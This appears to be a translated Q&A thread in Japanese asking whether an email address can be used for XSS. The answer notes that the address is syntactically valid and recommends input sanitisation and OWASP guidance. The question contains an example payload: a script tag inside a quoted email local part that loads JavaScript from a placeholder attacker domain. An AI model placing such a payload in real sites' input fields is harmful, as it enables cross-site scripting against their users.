7

メールアドレスが XSS 攻撃に使用できるかどうか疑問に思います。

登録してメールアドレスを提供できる Web サイトがあるとします。特定の Web サイトを攻撃したい場合、次のような電子メール アドレスを作成する可能性があります。

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com

次に、この電子メール アドレスを使用して Web サイトを攻撃します。

電子メール アドレスで引用またはスクリプト タグを使用できますか?

4

1 に答える 1

6

あなたの例の電子メールアドレスは有効に見えます。特殊な文字は引用符だけ"です。その他は有効です。

ウィキペディアは、指定した電子メール アドレスが有効であることを示唆しています。

任意のユーザー入力がレンダリングされる前にサニタイズされるようにする必要があります。

まず、OWASPで入手できるXSS防止に関する情報を参照することをお勧めします。

于 2013-07-05T04:24:20.607 に答える